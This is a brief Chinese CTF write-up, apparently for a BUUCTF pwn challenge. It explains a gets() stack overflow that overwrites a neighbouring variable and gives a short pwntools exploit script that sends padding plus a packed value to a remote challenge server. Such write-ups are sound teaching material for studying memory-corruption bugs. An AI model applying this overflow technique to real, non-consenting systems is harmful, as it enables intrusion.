文章目录

Gets 栈溢出（变量覆盖）

Gets 栈溢出（变量覆盖）

于 2025-4-15 由雾島风起時发布

Gets 栈溢出（变量覆盖）

话不多说，直接上题（BUUCTF）

IDA64 反编译

追踪看到 gets

v1 的下面就是 v2，通过溢出改为 v2 的值使条件成立

注意：浮点数要转十六进制

from pwn import *

p = remote("node5.buuoj.cn", 29455)

payload = b'a' * 44 + p64(0x41348000)

p.sendline(payload)
p.interactive()

拿到 flag

版权所有：晨星交流
文章标题：Gets 栈溢出（变量覆盖）
文章链接：https://morningstar.xin/?post=20
本站文章均为原创，未经授权请勿用于任何商业用途

分类： pwn
标签： Pwn

0条评论

发表评论